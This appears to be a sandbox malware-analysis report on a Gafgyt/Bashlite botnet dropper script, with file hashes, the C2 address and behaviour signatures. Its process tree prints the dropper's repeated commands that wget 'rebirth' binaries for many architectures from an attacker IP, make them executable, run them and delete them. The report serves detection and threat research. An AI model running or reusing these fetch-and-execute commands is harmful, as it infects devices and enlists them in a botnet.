Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

bins.sh

ubuntu-18.04-amd64

10

bins.sh

debian-9-armhf

10

bins.sh

debian-9-mips

10

bins.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    95s
  • max time network
    133s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20231215-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20231215-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    25/01/2024, 06:46

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bins.sh

  • Size

    1KB

  • MD5

    b2cfbd80cdf94849b51fb78a928e5d58

  • SHA1

    ce6aaa804e6d7285b704169d491b1f7db0d60507

  • SHA256

    6e6727498e4e5c70ace009cb48fa6d141ce81f84eac03c79ac95f42b14ff683d

  • SHA512

    8c8bedefa4bb62759bef189232eeefb25b0115411c77b290342cd1f0362956783d77f37b2afaaf30a5db6b7be4a339509ab22e91132ae79c030d3f3c6a9e292f

Score
10/10
gafgytbotnet

Malware Config

Extracted

Family

gafgyt

C2

45.95.169.10:666

Signatures

  • Detected Gafgyt variant 1 IoCs
  • Gafgyt/Bashlite

    IoT botnet with numerous variants first seen in 2014.

    botnetgafgyt
  • Executes dropped EXE 1 IoCs
  • Reads system routing table 1 TTPs 2 IoCs

    Gets active network interfaces from /proc virtual filesystem.

  • Reads system network configuration 1 TTPs 2 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Writes file to tmp directory 13 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:1551
      • /usr/bin/wget
        wget http://45.95.169.10/rebirth.arm4
        2⤵
        • Writes file to tmp directory
        PID:1552
      • /bin/chmod
        chmod +x rebirth.arm4
        2⤵
          PID:1557
        • /tmp/rebirth.arm4
          ./rebirth.arm4
          2⤵
          • Executes dropped EXE
          PID:1558
        • /bin/rm
          rm -rf rebirth.arm4
          2⤵
            PID:1560
          • /usr/bin/wget
            wget http://45.95.169.10/rebirth.arm4t
            2⤵
            • Writes file to tmp directory
            PID:1561
          • /bin/chmod
            chmod +x rebirth.arm4t
            2⤵
              PID:1562
            • /tmp/rebirth.arm4t
              ./rebirth.arm4t
              2⤵
                PID:1563
              • /bin/rm
                rm -rf rebirth.arm4t
                2⤵
                  PID:1565
                • /usr/bin/wget
                  wget http://45.95.169.10/rebirth.arm5
                  2⤵
                  • Writes file to tmp directory
                  PID:1566
                • /bin/chmod
                  chmod +x rebirth.arm5
                  2⤵
                    PID:1567
                  • /tmp/rebirth.arm5
                    ./rebirth.arm5
                    2⤵
                      PID:1568
                    • /bin/rm
                      rm -rf rebirth.arm5
                      2⤵
                        PID:1570
                      • /usr/bin/wget
                        wget http://45.95.169.10/rebirth.arm6
                        2⤵
                        • Writes file to tmp directory
                        PID:1571
                      • /bin/chmod
                        chmod +x rebirth.arm6
                        2⤵
                          PID:1572
                        • /tmp/rebirth.arm6
                          ./rebirth.arm6
                          2⤵
                            PID:1573
                          • /bin/rm
                            rm -rf rebirth.arm6
                            2⤵
                              PID:1575
                            • /usr/bin/wget
                              wget http://45.95.169.10/rebirth.i686
                              2⤵
                              • Writes file to tmp directory
                              PID:1576
                            • /bin/chmod
                              chmod +x rebirth.i686
                              2⤵
                                PID:1577
                              • /tmp/rebirth.i686
                                ./rebirth.i686
                                2⤵
                                • Reads system routing table
                                • Reads system network configuration
                                PID:1578
                              • /bin/rm
                                rm -rf rebirth.i686
                                2⤵
                                  PID:1581
                                • /usr/bin/wget
                                  wget http://45.95.169.10/rebirth.m68
                                  2⤵
                                  • Writes file to tmp directory
                                  PID:1582
                                • /bin/chmod
                                  chmod +x rebirth.m68
                                  2⤵
                                    PID:1583
                                  • /tmp/rebirth.m68
                                    ./rebirth.m68
                                    2⤵
                                      PID:1584
                                    • /bin/rm
                                      rm -rf rebirth.m68
                                      2⤵
                                        PID:1586
                                      • /usr/bin/wget
                                        wget http://45.95.169.10/rebirth.mips
                                        2⤵
                                        • Writes file to tmp directory
                                        PID:1587
                                      • /bin/chmod
                                        chmod +x rebirth.mips
                                        2⤵
                                          PID:1588
                                        • /tmp/rebirth.mips
                                          ./rebirth.mips
                                          2⤵
                                            PID:1589
                                          • /bin/rm
                                            rm -rf rebirth.mips
                                            2⤵
                                              PID:1591
                                            • /usr/bin/wget
                                              wget http://45.95.169.10/rebirth.mpsl
                                              2⤵
                                              • Writes file to tmp directory
                                              PID:1592
                                            • /bin/chmod
                                              chmod +x rebirth.mpsl
                                              2⤵
                                                PID:1593
                                              • /tmp/rebirth.mpsl
                                                ./rebirth.mpsl
                                                2⤵
                                                  PID:1594
                                                • /bin/rm
                                                  rm -rf rebirth.mpsl
                                                  2⤵
                                                    PID:1596
                                                  • /usr/bin/wget
                                                    wget http://45.95.169.10/rebirth.ppc
                                                    2⤵
                                                    • Writes file to tmp directory
                                                    PID:1597
                                                  • /bin/chmod
                                                    chmod +x rebirth.ppc
                                                    2⤵
                                                      PID:1598
                                                    • /tmp/rebirth.ppc
                                                      ./rebirth.ppc
                                                      2⤵
                                                        PID:1599
                                                      • /bin/rm
                                                        rm -rf rebirth.ppc
                                                        2⤵
                                                          PID:1601
                                                        • /usr/bin/wget
                                                          wget http://45.95.169.10/rebirth.spc
                                                          2⤵
                                                          • Writes file to tmp directory
                                                          PID:1602
                                                        • /bin/chmod
                                                          chmod +x rebirth.spc
                                                          2⤵
                                                            PID:1603
                                                          • /tmp/rebirth.spc
                                                            ./rebirth.spc
                                                            2⤵
                                                              PID:1604
                                                            • /bin/rm
                                                              rm -rf rebirth.spc
                                                              2⤵
                                                                PID:1606
                                                              • /usr/bin/wget
                                                                wget http://45.95.169.10/rebirth.x86
                                                                2⤵
                                                                • Writes file to tmp directory
                                                                PID:1607
                                                              • /bin/chmod
                                                                chmod +x rebirth.x86
                                                                2⤵
                                                                  PID:1608
                                                                • /tmp/rebirth.x86
                                                                  ./rebirth.x86
                                                                  2⤵
                                                                  • Reads system routing table
                                                                  • Reads system network configuration
                                                                  PID:1609
                                                                • /bin/rm
                                                                  rm -rf rebirth.x86
                                                                  2⤵
                                                                    PID:1612
                                                                  • /usr/bin/wget
                                                                    wget http://45.95.169.10/rebirth.sh4
                                                                    2⤵
                                                                    • Writes file to tmp directory
                                                                    PID:1613
                                                                  • /bin/chmod
                                                                    chmod +x rebirth.sh4
                                                                    2⤵
                                                                      PID:1614
                                                                    • /tmp/rebirth.sh4
                                                                      ./rebirth.sh4
                                                                      2⤵
                                                                        PID:1615
                                                                      • /bin/rm
                                                                        rm -rf rebirth.sh4
                                                                        2⤵
                                                                          PID:1617
                                                                        • /usr/bin/wget
                                                                          wget http://45.95.169.10/rebirth.arm7
                                                                          2⤵
                                                                          • Writes file to tmp directory
                                                                          PID:1618
                                                                        • /bin/chmod
                                                                          chmod +x rebirth.arm7
                                                                          2⤵
                                                                            PID:1619
                                                                          • /tmp/rebirth.arm7
                                                                            ./rebirth.arm7
                                                                            2⤵
                                                                              PID:1620
                                                                            • /bin/rm
                                                                              rm -rf rebirth.arm7
                                                                              2⤵
                                                                                PID:1622

                                                                            Network

                                                                            MITRE ATT&CK Enterprise v15

                                                                            Replay Monitor

                                                                            Loading Replay Monitor...

                                                                            Downloads

                                                                            • /tmp/rebirth.arm4
                                                                              Filesize

                                                                              108KB

                                                                              MD5

                                                                              fb5cfb28c8938312a3528278742d404d

                                                                              SHA1

                                                                              f8ec0f9eaafc09ad3e10d4854bd798b892b2f9f6

                                                                              SHA256

                                                                              aa40049525de986cc33f4d7cd663fb09e825d54c68d37244921172bb375ba513

                                                                              SHA512

                                                                              4e04556dd0ced7c23ff82257eee81fb10261cdf4e5a99459efc49e8a515485b2b99916bb2301434ca5d90b8e97df788db6448004fa15820435009da395f3d278

                                                                              Download Submit